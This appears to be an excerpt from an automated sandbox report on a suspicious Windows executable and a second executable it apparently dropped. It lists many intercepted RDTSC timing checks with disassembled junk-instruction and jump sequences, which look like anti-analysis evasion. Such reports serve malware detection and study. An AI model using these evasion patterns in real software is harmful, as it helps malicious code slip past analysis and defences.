                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5710823 second address: 5710829 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5710829 second address: 571082D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 571082D second address: 5710853 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99A452D6D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ecx, edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov cx, di 0x00000013 mov si, di 0x00000016 popad 0x00000017 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5710853 second address: 5710859 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5710859 second address: 571085D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 571085D second address: 5710861 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5710861 second address: 571089D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 shr ecx, 02h 0x0000000b jmp 00007F99A452D6D8h 0x00000010 rep movsd 0x00000012 rep movsd 0x00000014 rep movsd 0x00000016 rep movsd 0x00000018 rep movsd 0x0000001a jmp 00007F99A452D6D0h 0x0000001f mov ecx, edx 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 571089D second address: 57108A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57108A1 second address: 57108AB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57108AB second address: 57108E2 instructions: 0x00000000 rdtsc 0x00000002 call 00007F99A4D68172h 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b and ecx, 03h 0x0000000e jmp 00007F99A4D68171h 0x00000013 rep movsb 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov ecx, 69FFEC05h 0x0000001d popad 0x0000001e rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57108E2 second address: 5710930 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F99A452D6D1h 0x00000009 add ecx, 1211FAD6h 0x0000000f jmp 00007F99A452D6D1h 0x00000014 popfd 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov dword ptr [ebp-04h], FFFFFFFEh 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F99A452D6D3h 0x00000028 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5710930 second address: 5710993 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F99A4D68175h 0x0000000b or ax, 6D96h 0x00000010 jmp 00007F99A4D68171h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov eax, ebx 0x0000001b jmp 00007F99A4D6816Eh 0x00000020 mov ecx, dword ptr [ebp-10h] 0x00000023 jmp 00007F99A4D68170h 0x00000028 mov dword ptr fs:[00000000h], ecx 0x0000002f pushad 0x00000030 push ecx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5710993 second address: 57109C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushfd 0x00000008 jmp 00007F99A452D6D6h 0x0000000d xor ch, 00000048h 0x00000010 jmp 00007F99A452D6CBh 0x00000015 popfd 0x00000016 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57109C0 second address: 5710A05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop ecx 0x00000008 jmp 00007F99A4D68174h 0x0000000d pop edi 0x0000000e jmp 00007F99A4D68170h 0x00000013 pop esi 0x00000014 jmp 00007F99A4D68170h 0x00000019 pop ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5710A05 second address: 5710A22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99A452D6D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5710A22 second address: 5710622 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 2FB2h 0x00000007 pushfd 0x00000008 jmp 00007F99A4D68173h 0x0000000d sub esi, 3A0E39AEh 0x00000013 jmp 00007F99A4D68179h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c leave 0x0000001d pushad 0x0000001e mov edx, 191C270Eh 0x00000023 popad 0x00000024 retn 0008h 0x00000027 cmp dword ptr [ebp-2Ch], 10h 0x0000002b mov eax, dword ptr [ebp-40h] 0x0000002e jnc 00007F99A4D68165h 0x00000030 push eax 0x00000031 lea edx, dword ptr [ebp-00000590h] 0x00000037 push edx 0x00000038 call esi 0x0000003a push 00000008h 0x0000003c pushad 0x0000003d pushfd 0x0000003e jmp 00007F99A4D68172h 0x00000043 or eax, 24709CB8h 0x00000049 jmp 00007F99A4D6816Bh 0x0000004e popfd 0x0000004f mov ah, CCh 0x00000051 popad 0x00000052 push 4E808CF2h 0x00000057 jmp 00007F99A4D68170h 0x0000005c xor dword ptr [esp], 39A290DAh 0x00000063 pushad 0x00000064 pushfd 0x00000065 jmp 00007F99A4D6816Eh 0x0000006a or ecx, 4D9C3648h 0x00000070 jmp 00007F99A4D6816Bh 0x00000075 popfd 0x00000076 push eax 0x00000077 push edx 0x00000078 mov edi, eax 0x0000007a rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: 8CEB09 second address: 8CEB25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F99A452D6D2h 0x0000000f rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A49E7D second address: A49E82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A49E82 second address: A49E9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F99A452D6D6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A50B03 second address: A50B23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99A4D68177h 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d pop eax 0x0000000e rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A50E4E second address: A50E53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A50E53 second address: A50E58 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A50F93 second address: A50F9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A510CD second address: A510D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A510D3 second address: A510DD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 pop edi 0x0000000a rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A535AF second address: A535B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A535B5 second address: A535CB instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F99A452D6C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 jne 00007F99A452D6C6h 0x00000016 rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A535CB second address: A535E3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c jno 00007F99A4D68168h 0x00000012 push eax 0x00000013 push edx 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A5373F second address: A53744 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A53829 second address: A5387D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99A4D68174h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a xor dword ptr [esp], 6DE0CA18h 0x00000011 jng 00007F99A4D6817Dh 0x00000017 lea ebx, dword ptr [ebp+12458443h] 0x0000001d xor dword ptr [ebp+122D1AB2h], eax 0x00000023 xchg eax, ebx 0x00000024 je 00007F99A4D68178h 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A5387D second address: A53881 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A538C1 second address: A538C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A538C7 second address: A538CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A64DF3 second address: A64E13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F99A4D68177h 0x0000000e rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A64E13 second address: A64E34 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99A452D6D6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A64E34 second address: A64E38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A64E38 second address: A64E4E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99A452D6CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A72960 second address: A72972 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99A4D6816Eh 0x00000009 rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A72972 second address: A72976 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A72976 second address: A72980 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A72980 second address: A72984 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A72984 second address: A72988 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A72988 second address: A72990 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A72B2F second address: A72B6F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c jbe 00007F99A4D68166h 0x00000012 jmp 00007F99A4D6816Fh 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a jnp 00007F99A4D6817Ch 0x00000020 jnl 00007F99A4D68166h 0x00000026 jmp 00007F99A4D68170h 0x0000002b rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A72B6F second address: A72B81 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F99A452D6C8h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007F99A452D6C6h 0x00000012 rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A72B81 second address: A72B87 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A72E23 second address: A72E27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A72E27 second address: A72E43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F99A4D68172h 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A730FC second address: A73100 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A73100 second address: A7311F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99A4D68176h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A7311F second address: A73123 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A73123 second address: A7312D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F99A4D68166h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A7312D second address: A73151 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F99A452D6D9h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A73290 second address: A732B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99A4D68172h 0x00000009 jmp 00007F99A4D6816Eh 0x0000000e rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A732B4 second address: A732BE instructions: 0x00000000 rdtsc 0x00000002 jg 00007F99A452D6C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A7359A second address: A735A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A735A0 second address: A735A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A735A4 second address: A735AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A735AC second address: A735C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99A452D6CCh 0x00000007 jc 00007F99A452D6CCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A73877 second address: A7388C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99A4D6816Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A7388C second address: A738A6 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F99A452D6C6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F99A452D6CAh 0x00000014 pop ecx 0x00000015 rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A741D8 second address: A741DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A741DE second address: A741F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99A452D6D0h 0x00000009 popad 0x0000000a rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A741F3 second address: A74254 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F99A4D68197h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007F99A4D6816Eh 0x00000012 push ecx 0x00000013 je 00007F99A4D68166h 0x00000019 jmp 00007F99A4D6816Eh 0x0000001e pop ecx 0x0000001f rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A74254 second address: A7426D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F99A452D6CFh 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A743DB second address: A743F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99A4D68170h 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007F99A4D68166h 0x00000011 rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A743F7 second address: A743FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A743FB second address: A7440B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007F99A4D68166h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A7440B second address: A7440F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A7440F second address: A7442A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F99A4D68171h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A7442A second address: A74430 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A74430 second address: A74434 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A74434 second address: A74452 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 jmp 00007F99A452D6CBh 0x0000000e pushad 0x0000000f popad 0x00000010 push esi 0x00000011 pop esi 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A74593 second address: A74599 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A74599 second address: A745A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A745A4 second address: A745A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A745A8 second address: A745B8 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F99A452D6C6h 0x00000008 je 00007F99A452D6C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A74886 second address: A748D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jng 00007F99A4D6816Ch 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jns 00007F99A4D68166h 0x00000015 jmp 00007F99A4D68174h 0x0000001a popad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e push esi 0x0000001f pushad 0x00000020 popad 0x00000021 jng 00007F99A4D68166h 0x00000027 pop esi 0x00000028 pushad 0x00000029 jno 00007F99A4D68166h 0x0000002f push edi 0x00000030 pop edi 0x00000031 jmp 00007F99A4D6816Bh 0x00000036 popad 0x00000037 rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A748D8 second address: A748ED instructions: 0x00000000 rdtsc 0x00000002 jc 00007F99A452D6CEh 0x00000008 jns 00007F99A452D6C6h 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A79B69 second address: A79B6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A79B6D second address: A79B73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A7908E second address: A79094 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A7A2B1 second address: A7A2BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A80E37 second address: A80E54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F99A4D68174h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A3B10A second address: A3B110 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A3B110 second address: A3B11D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
